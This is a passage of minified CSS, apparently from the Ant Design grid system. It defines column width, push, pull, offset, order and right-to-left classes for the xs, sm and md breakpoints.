{ left: 25%; } .ant-col-xs-pull-6 { right: 25%; } .ant-col-xs-offset-6 { margin-left: 25%; } .ant-col-xs-order-6 { order: 6; } .ant-col-xs-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-xs-push-5 { left: 20.83333333%; } .ant-col-xs-pull-5 { right: 20.83333333%; } .ant-col-xs-offset-5 { margin-left: 20.83333333%; } .ant-col-xs-order-5 { order: 5; } .ant-col-xs-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-xs-push-4 { left: 16.66666667%; } .ant-col-xs-pull-4 { right: 16.66666667%; } .ant-col-xs-offset-4 { margin-left: 16.66666667%; } .ant-col-xs-order-4 { order: 4; } .ant-col-xs-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-xs-push-3 { left: 12.5%; } .ant-col-xs-pull-3 { right: 12.5%; } .ant-col-xs-offset-3 { margin-left: 12.5%; } .ant-col-xs-order-3 { order: 3; } .ant-col-xs-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-xs-push-2 { left: 8.33333333%; } .ant-col-xs-pull-2 { right: 8.33333333%; } .ant-col-xs-offset-2 { margin-left: 8.33333333%; } .ant-col-xs-order-2 { order: 2; } .ant-col-xs-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-xs-push-1 { left: 4.16666667%; } .ant-col-xs-pull-1 { right: 4.16666667%; } .ant-col-xs-offset-1 { margin-left: 4.16666667%; } .ant-col-xs-order-1 { order: 1; } .ant-col-xs-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-xs-push-0 { left: auto; } .ant-col-xs-pull-0 { right: auto; } .ant-col-xs-offset-0 { margin-left: 0; } .ant-col-xs-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-xs-push-0.ant-col-rtl { right: auto; } .ant-col-xs-pull-0.ant-col-rtl { left: auto; } .ant-col-xs-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-xs-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-xs-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-xs-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-xs-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-xs-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-xs-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-xs-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-xs-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-xs-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-xs-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-xs-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-xs-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-xs-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-xs-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-xs-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-xs-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-xs-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-xs-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-xs-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-xs-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-xs-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-xs-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-xs-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-xs-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-xs-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-xs-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-xs-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-xs-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-xs-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-xs-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-xs-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-xs-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-xs-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-xs-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-xs-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-xs-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-xs-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-xs-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-xs-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-xs-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-xs-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-xs-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-xs-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-xs-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-xs-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-xs-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-xs-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-xs-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-xs-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-xs-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-xs-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-xs-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-xs-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-xs-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-xs-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-xs-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-xs-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-xs-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-xs-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-xs-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-xs-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-xs-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-xs-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-xs-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-xs-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-xs-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-xs-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-xs-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-xs-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-xs-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-xs-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-xs-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } @media (min-width: 576px) { .ant-col-sm-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-sm-push-24 { left: 100%; } .ant-col-sm-pull-24 { right: 100%; } .ant-col-sm-offset-24 { margin-left: 100%; } .ant-col-sm-order-24 { order: 24; } .ant-col-sm-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-sm-push-23 { left: 95.83333333%; } .ant-col-sm-pull-23 { right: 95.83333333%; } .ant-col-sm-offset-23 { margin-left: 95.83333333%; } .ant-col-sm-order-23 { order: 23; } .ant-col-sm-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-sm-push-22 { left: 91.66666667%; } .ant-col-sm-pull-22 { right: 91.66666667%; } .ant-col-sm-offset-22 { margin-left: 91.66666667%; } .ant-col-sm-order-22 { order: 22; } .ant-col-sm-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-sm-push-21 { left: 87.5%; } .ant-col-sm-pull-21 { right: 87.5%; } .ant-col-sm-offset-21 { margin-left: 87.5%; } .ant-col-sm-order-21 { order: 21; } .ant-col-sm-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-sm-push-20 { left: 83.33333333%; } .ant-col-sm-pull-20 { right: 83.33333333%; } .ant-col-sm-offset-20 { margin-left: 83.33333333%; } .ant-col-sm-order-20 { order: 20; } .ant-col-sm-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-sm-push-19 { left: 79.16666667%; } .ant-col-sm-pull-19 { right: 79.16666667%; } .ant-col-sm-offset-19 { margin-left: 79.16666667%; } .ant-col-sm-order-19 { order: 19; } .ant-col-sm-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-sm-push-18 { left: 75%; } .ant-col-sm-pull-18 { right: 75%; } .ant-col-sm-offset-18 { margin-left: 75%; } .ant-col-sm-order-18 { order: 18; } .ant-col-sm-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-sm-push-17 { left: 70.83333333%; } .ant-col-sm-pull-17 { right: 70.83333333%; } .ant-col-sm-offset-17 { margin-left: 70.83333333%; } .ant-col-sm-order-17 { order: 17; } .ant-col-sm-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-sm-push-16 { left: 66.66666667%; } .ant-col-sm-pull-16 { right: 66.66666667%; } .ant-col-sm-offset-16 { margin-left: 66.66666667%; } .ant-col-sm-order-16 { order: 16; } .ant-col-sm-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-sm-push-15 { left: 62.5%; } .ant-col-sm-pull-15 { right: 62.5%; } .ant-col-sm-offset-15 { margin-left: 62.5%; } .ant-col-sm-order-15 { order: 15; } .ant-col-sm-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-sm-push-14 { left: 58.33333333%; } .ant-col-sm-pull-14 { right: 58.33333333%; } .ant-col-sm-offset-14 { margin-left: 58.33333333%; } .ant-col-sm-order-14 { order: 14; } .ant-col-sm-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-sm-push-13 { left: 54.16666667%; } .ant-col-sm-pull-13 { right: 54.16666667%; } .ant-col-sm-offset-13 { margin-left: 54.16666667%; } .ant-col-sm-order-13 { order: 13; } .ant-col-sm-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-sm-push-12 { left: 50%; } .ant-col-sm-pull-12 { right: 50%; } .ant-col-sm-offset-12 { margin-left: 50%; } .ant-col-sm-order-12 { order: 12; } .ant-col-sm-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-sm-push-11 { left: 45.83333333%; } .ant-col-sm-pull-11 { right: 45.83333333%; } .ant-col-sm-offset-11 { margin-left: 45.83333333%; } .ant-col-sm-order-11 { order: 11; } .ant-col-sm-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-sm-push-10 { left: 41.66666667%; } .ant-col-sm-pull-10 { right: 41.66666667%; } .ant-col-sm-offset-10 { margin-left: 41.66666667%; } .ant-col-sm-order-10 { order: 10; } .ant-col-sm-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-sm-push-9 { left: 37.5%; } .ant-col-sm-pull-9 { right: 37.5%; } .ant-col-sm-offset-9 { margin-left: 37.5%; } .ant-col-sm-order-9 { order: 9; } .ant-col-sm-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-sm-push-8 { left: 33.33333333%; } .ant-col-sm-pull-8 { right: 33.33333333%; } .ant-col-sm-offset-8 { margin-left: 33.33333333%; } .ant-col-sm-order-8 { order: 8; } .ant-col-sm-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-sm-push-7 { left: 29.16666667%; } .ant-col-sm-pull-7 { right: 29.16666667%; } .ant-col-sm-offset-7 { margin-left: 29.16666667%; } .ant-col-sm-order-7 { order: 7; } .ant-col-sm-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-sm-push-6 { left: 25%; } .ant-col-sm-pull-6 { right: 25%; } .ant-col-sm-offset-6 { margin-left: 25%; } .ant-col-sm-order-6 { order: 6; } .ant-col-sm-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-sm-push-5 { left: 20.83333333%; } .ant-col-sm-pull-5 { right: 20.83333333%; } .ant-col-sm-offset-5 { margin-left: 20.83333333%; } .ant-col-sm-order-5 { order: 5; } .ant-col-sm-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-sm-push-4 { left: 16.66666667%; } .ant-col-sm-pull-4 { right: 16.66666667%; } .ant-col-sm-offset-4 { margin-left: 16.66666667%; } .ant-col-sm-order-4 { order: 4; } .ant-col-sm-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-sm-push-3 { left: 12.5%; } .ant-col-sm-pull-3 { right: 12.5%; } .ant-col-sm-offset-3 { margin-left: 12.5%; } .ant-col-sm-order-3 { order: 3; } .ant-col-sm-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-sm-push-2 { left: 8.33333333%; } .ant-col-sm-pull-2 { right: 8.33333333%; } .ant-col-sm-offset-2 { margin-left: 8.33333333%; } .ant-col-sm-order-2 { order: 2; } .ant-col-sm-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-sm-push-1 { left: 4.16666667%; } .ant-col-sm-pull-1 { right: 4.16666667%; } .ant-col-sm-offset-1 { margin-left: 4.16666667%; } .ant-col-sm-order-1 { order: 1; } .ant-col-sm-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-sm-push-0 { left: auto; } .ant-col-sm-pull-0 { right: auto; } .ant-col-sm-offset-0 { margin-left: 0; } .ant-col-sm-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-sm-push-0.ant-col-rtl { right: auto; } .ant-col-sm-pull-0.ant-col-rtl { left: auto; } .ant-col-sm-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-sm-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-sm-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-sm-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-sm-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-sm-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-sm-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-sm-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-sm-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-sm-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-sm-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-sm-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-sm-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-sm-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-sm-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-sm-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-sm-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-sm-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-sm-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-sm-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-sm-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-sm-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-sm-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-sm-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-sm-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-sm-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-sm-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-sm-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-sm-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } .ant-col-sm-pull-10.ant-col-rtl { right: auto; left: 41.66666667%; } .ant-col-sm-offset-10.ant-col-rtl { margin-right: 41.66666667%; margin-left: 0; } .ant-col-sm-push-11.ant-col-rtl { right: 45.83333333%; left: auto; } .ant-col-sm-pull-11.ant-col-rtl { right: auto; left: 45.83333333%; } .ant-col-sm-offset-11.ant-col-rtl { margin-right: 45.83333333%; margin-left: 0; } .ant-col-sm-push-12.ant-col-rtl { right: 50%; left: auto; } .ant-col-sm-pull-12.ant-col-rtl { right: auto; left: 50%; } .ant-col-sm-offset-12.ant-col-rtl { margin-right: 50%; margin-left: 0; } .ant-col-sm-push-13.ant-col-rtl { right: 54.16666667%; left: auto; } .ant-col-sm-pull-13.ant-col-rtl { right: auto; left: 54.16666667%; } .ant-col-sm-offset-13.ant-col-rtl { margin-right: 54.16666667%; margin-left: 0; } .ant-col-sm-push-14.ant-col-rtl { right: 58.33333333%; left: auto; } .ant-col-sm-pull-14.ant-col-rtl { right: auto; left: 58.33333333%; } .ant-col-sm-offset-14.ant-col-rtl { margin-right: 58.33333333%; margin-left: 0; } .ant-col-sm-push-15.ant-col-rtl { right: 62.5%; left: auto; } .ant-col-sm-pull-15.ant-col-rtl { right: auto; left: 62.5%; } .ant-col-sm-offset-15.ant-col-rtl { margin-right: 62.5%; margin-left: 0; } .ant-col-sm-push-16.ant-col-rtl { right: 66.66666667%; left: auto; } .ant-col-sm-pull-16.ant-col-rtl { right: auto; left: 66.66666667%; } .ant-col-sm-offset-16.ant-col-rtl { margin-right: 66.66666667%; margin-left: 0; } .ant-col-sm-push-17.ant-col-rtl { right: 70.83333333%; left: auto; } .ant-col-sm-pull-17.ant-col-rtl { right: auto; left: 70.83333333%; } .ant-col-sm-offset-17.ant-col-rtl { margin-right: 70.83333333%; margin-left: 0; } .ant-col-sm-push-18.ant-col-rtl { right: 75%; left: auto; } .ant-col-sm-pull-18.ant-col-rtl { right: auto; left: 75%; } .ant-col-sm-offset-18.ant-col-rtl { margin-right: 75%; margin-left: 0; } .ant-col-sm-push-19.ant-col-rtl { right: 79.16666667%; left: auto; } .ant-col-sm-pull-19.ant-col-rtl { right: auto; left: 79.16666667%; } .ant-col-sm-offset-19.ant-col-rtl { margin-right: 79.16666667%; margin-left: 0; } .ant-col-sm-push-20.ant-col-rtl { right: 83.33333333%; left: auto; } .ant-col-sm-pull-20.ant-col-rtl { right: auto; left: 83.33333333%; } .ant-col-sm-offset-20.ant-col-rtl { margin-right: 83.33333333%; margin-left: 0; } .ant-col-sm-push-21.ant-col-rtl { right: 87.5%; left: auto; } .ant-col-sm-pull-21.ant-col-rtl { right: auto; left: 87.5%; } .ant-col-sm-offset-21.ant-col-rtl { margin-right: 87.5%; margin-left: 0; } .ant-col-sm-push-22.ant-col-rtl { right: 91.66666667%; left: auto; } .ant-col-sm-pull-22.ant-col-rtl { right: auto; left: 91.66666667%; } .ant-col-sm-offset-22.ant-col-rtl { margin-right: 91.66666667%; margin-left: 0; } .ant-col-sm-push-23.ant-col-rtl { right: 95.83333333%; left: auto; } .ant-col-sm-pull-23.ant-col-rtl { right: auto; left: 95.83333333%; } .ant-col-sm-offset-23.ant-col-rtl { margin-right: 95.83333333%; margin-left: 0; } .ant-col-sm-push-24.ant-col-rtl { right: 100%; left: auto; } .ant-col-sm-pull-24.ant-col-rtl { right: auto; left: 100%; } .ant-col-sm-offset-24.ant-col-rtl { margin-right: 100%; margin-left: 0; } } @media (min-width: 768px) { .ant-col-md-24 { display: block; flex: 0 0 100%; max-width: 100%; } .ant-col-md-push-24 { left: 100%; } .ant-col-md-pull-24 { right: 100%; } .ant-col-md-offset-24 { margin-left: 100%; } .ant-col-md-order-24 { order: 24; } .ant-col-md-23 { display: block; flex: 0 0 95.83333333%; max-width: 95.83333333%; } .ant-col-md-push-23 { left: 95.83333333%; } .ant-col-md-pull-23 { right: 95.83333333%; } .ant-col-md-offset-23 { margin-left: 95.83333333%; } .ant-col-md-order-23 { order: 23; } .ant-col-md-22 { display: block; flex: 0 0 91.66666667%; max-width: 91.66666667%; } .ant-col-md-push-22 { left: 91.66666667%; } .ant-col-md-pull-22 { right: 91.66666667%; } .ant-col-md-offset-22 { margin-left: 91.66666667%; } .ant-col-md-order-22 { order: 22; } .ant-col-md-21 { display: block; flex: 0 0 87.5%; max-width: 87.5%; } .ant-col-md-push-21 { left: 87.5%; } .ant-col-md-pull-21 { right: 87.5%; } .ant-col-md-offset-21 { margin-left: 87.5%; } .ant-col-md-order-21 { order: 21; } .ant-col-md-20 { display: block; flex: 0 0 83.33333333%; max-width: 83.33333333%; } .ant-col-md-push-20 { left: 83.33333333%; } .ant-col-md-pull-20 { right: 83.33333333%; } .ant-col-md-offset-20 { margin-left: 83.33333333%; } .ant-col-md-order-20 { order: 20; } .ant-col-md-19 { display: block; flex: 0 0 79.16666667%; max-width: 79.16666667%; } .ant-col-md-push-19 { left: 79.16666667%; } .ant-col-md-pull-19 { right: 79.16666667%; } .ant-col-md-offset-19 { margin-left: 79.16666667%; } .ant-col-md-order-19 { order: 19; } .ant-col-md-18 { display: block; flex: 0 0 75%; max-width: 75%; } .ant-col-md-push-18 { left: 75%; } .ant-col-md-pull-18 { right: 75%; } .ant-col-md-offset-18 { margin-left: 75%; } .ant-col-md-order-18 { order: 18; } .ant-col-md-17 { display: block; flex: 0 0 70.83333333%; max-width: 70.83333333%; } .ant-col-md-push-17 { left: 70.83333333%; } .ant-col-md-pull-17 { right: 70.83333333%; } .ant-col-md-offset-17 { margin-left: 70.83333333%; } .ant-col-md-order-17 { order: 17; } .ant-col-md-16 { display: block; flex: 0 0 66.66666667%; max-width: 66.66666667%; } .ant-col-md-push-16 { left: 66.66666667%; } .ant-col-md-pull-16 { right: 66.66666667%; } .ant-col-md-offset-16 { margin-left: 66.66666667%; } .ant-col-md-order-16 { order: 16; } .ant-col-md-15 { display: block; flex: 0 0 62.5%; max-width: 62.5%; } .ant-col-md-push-15 { left: 62.5%; } .ant-col-md-pull-15 { right: 62.5%; } .ant-col-md-offset-15 { margin-left: 62.5%; } .ant-col-md-order-15 { order: 15; } .ant-col-md-14 { display: block; flex: 0 0 58.33333333%; max-width: 58.33333333%; } .ant-col-md-push-14 { left: 58.33333333%; } .ant-col-md-pull-14 { right: 58.33333333%; } .ant-col-md-offset-14 { margin-left: 58.33333333%; } .ant-col-md-order-14 { order: 14; } .ant-col-md-13 { display: block; flex: 0 0 54.16666667%; max-width: 54.16666667%; } .ant-col-md-push-13 { left: 54.16666667%; } .ant-col-md-pull-13 { right: 54.16666667%; } .ant-col-md-offset-13 { margin-left: 54.16666667%; } .ant-col-md-order-13 { order: 13; } .ant-col-md-12 { display: block; flex: 0 0 50%; max-width: 50%; } .ant-col-md-push-12 { left: 50%; } .ant-col-md-pull-12 { right: 50%; } .ant-col-md-offset-12 { margin-left: 50%; } .ant-col-md-order-12 { order: 12; } .ant-col-md-11 { display: block; flex: 0 0 45.83333333%; max-width: 45.83333333%; } .ant-col-md-push-11 { left: 45.83333333%; } .ant-col-md-pull-11 { right: 45.83333333%; } .ant-col-md-offset-11 { margin-left: 45.83333333%; } .ant-col-md-order-11 { order: 11; } .ant-col-md-10 { display: block; flex: 0 0 41.66666667%; max-width: 41.66666667%; } .ant-col-md-push-10 { left: 41.66666667%; } .ant-col-md-pull-10 { right: 41.66666667%; } .ant-col-md-offset-10 { margin-left: 41.66666667%; } .ant-col-md-order-10 { order: 10; } .ant-col-md-9 { display: block; flex: 0 0 37.5%; max-width: 37.5%; } .ant-col-md-push-9 { left: 37.5%; } .ant-col-md-pull-9 { right: 37.5%; } .ant-col-md-offset-9 { margin-left: 37.5%; } .ant-col-md-order-9 { order: 9; } .ant-col-md-8 { display: block; flex: 0 0 33.33333333%; max-width: 33.33333333%; } .ant-col-md-push-8 { left: 33.33333333%; } .ant-col-md-pull-8 { right: 33.33333333%; } .ant-col-md-offset-8 { margin-left: 33.33333333%; } .ant-col-md-order-8 { order: 8; } .ant-col-md-7 { display: block; flex: 0 0 29.16666667%; max-width: 29.16666667%; } .ant-col-md-push-7 { left: 29.16666667%; } .ant-col-md-pull-7 { right: 29.16666667%; } .ant-col-md-offset-7 { margin-left: 29.16666667%; } .ant-col-md-order-7 { order: 7; } .ant-col-md-6 { display: block; flex: 0 0 25%; max-width: 25%; } .ant-col-md-push-6 { left: 25%; } .ant-col-md-pull-6 { right: 25%; } .ant-col-md-offset-6 { margin-left: 25%; } .ant-col-md-order-6 { order: 6; } .ant-col-md-5 { display: block; flex: 0 0 20.83333333%; max-width: 20.83333333%; } .ant-col-md-push-5 { left: 20.83333333%; } .ant-col-md-pull-5 { right: 20.83333333%; } .ant-col-md-offset-5 { margin-left: 20.83333333%; } .ant-col-md-order-5 { order: 5; } .ant-col-md-4 { display: block; flex: 0 0 16.66666667%; max-width: 16.66666667%; } .ant-col-md-push-4 { left: 16.66666667%; } .ant-col-md-pull-4 { right: 16.66666667%; } .ant-col-md-offset-4 { margin-left: 16.66666667%; } .ant-col-md-order-4 { order: 4; } .ant-col-md-3 { display: block; flex: 0 0 12.5%; max-width: 12.5%; } .ant-col-md-push-3 { left: 12.5%; } .ant-col-md-pull-3 { right: 12.5%; } .ant-col-md-offset-3 { margin-left: 12.5%; } .ant-col-md-order-3 { order: 3; } .ant-col-md-2 { display: block; flex: 0 0 8.33333333%; max-width: 8.33333333%; } .ant-col-md-push-2 { left: 8.33333333%; } .ant-col-md-pull-2 { right: 8.33333333%; } .ant-col-md-offset-2 { margin-left: 8.33333333%; } .ant-col-md-order-2 { order: 2; } .ant-col-md-1 { display: block; flex: 0 0 4.16666667%; max-width: 4.16666667%; } .ant-col-md-push-1 { left: 4.16666667%; } .ant-col-md-pull-1 { right: 4.16666667%; } .ant-col-md-offset-1 { margin-left: 4.16666667%; } .ant-col-md-order-1 { order: 1; } .ant-col-md-0 { display: none; } .ant-col-push-0 { left: auto; } .ant-col-pull-0 { right: auto; } .ant-col-md-push-0 { left: auto; } .ant-col-md-pull-0 { right: auto; } .ant-col-md-offset-0 { margin-left: 0; } .ant-col-md-order-0 { order: 0; } .ant-col-push-0.ant-col-rtl { right: auto; } .ant-col-pull-0.ant-col-rtl { left: auto; } .ant-col-md-push-0.ant-col-rtl { right: auto; } .ant-col-md-pull-0.ant-col-rtl { left: auto; } .ant-col-md-offset-0.ant-col-rtl { margin-right: 0; } .ant-col-md-push-1.ant-col-rtl { right: 4.16666667%; left: auto; } .ant-col-md-pull-1.ant-col-rtl { right: auto; left: 4.16666667%; } .ant-col-md-offset-1.ant-col-rtl { margin-right: 4.16666667%; margin-left: 0; } .ant-col-md-push-2.ant-col-rtl { right: 8.33333333%; left: auto; } .ant-col-md-pull-2.ant-col-rtl { right: auto; left: 8.33333333%; } .ant-col-md-offset-2.ant-col-rtl { margin-right: 8.33333333%; margin-left: 0; } .ant-col-md-push-3.ant-col-rtl { right: 12.5%; left: auto; } .ant-col-md-pull-3.ant-col-rtl { right: auto; left: 12.5%; } .ant-col-md-offset-3.ant-col-rtl { margin-right: 12.5%; margin-left: 0; } .ant-col-md-push-4.ant-col-rtl { right: 16.66666667%; left: auto; } .ant-col-md-pull-4.ant-col-rtl { right: auto; left: 16.66666667%; } .ant-col-md-offset-4.ant-col-rtl { margin-right: 16.66666667%; margin-left: 0; } .ant-col-md-push-5.ant-col-rtl { right: 20.83333333%; left: auto; } .ant-col-md-pull-5.ant-col-rtl { right: auto; left: 20.83333333%; } .ant-col-md-offset-5.ant-col-rtl { margin-right: 20.83333333%; margin-left: 0; } .ant-col-md-push-6.ant-col-rtl { right: 25%; left: auto; } .ant-col-md-pull-6.ant-col-rtl { right: auto; left: 25%; } .ant-col-md-offset-6.ant-col-rtl { margin-right: 25%; margin-left: 0; } .ant-col-md-push-7.ant-col-rtl { right: 29.16666667%; left: auto; } .ant-col-md-pull-7.ant-col-rtl { right: auto; left: 29.16666667%; } .ant-col-md-offset-7.ant-col-rtl { margin-right: 29.16666667%; margin-left: 0; } .ant-col-md-push-8.ant-col-rtl { right: 33.33333333%; left: auto; } .ant-col-md-pull-8.ant-col-rtl { right: auto; left: 33.33333333%; } .ant-col-md-offset-8.ant-col-rtl { margin-right: 33.33333333%; margin-left: 0; } .ant-col-md-push-9.ant-col-rtl { right: 37.5%; left: auto; } .ant-col-md-pull-9.ant-col-rtl { right: auto; left: 37.5%; } .ant-col-md-offset-9.ant-col-rtl { margin-right: 37.5%; margin-left: 0; } .ant-col-md-push-10.ant-col-rtl { right: 41.66666667%; left: auto; } 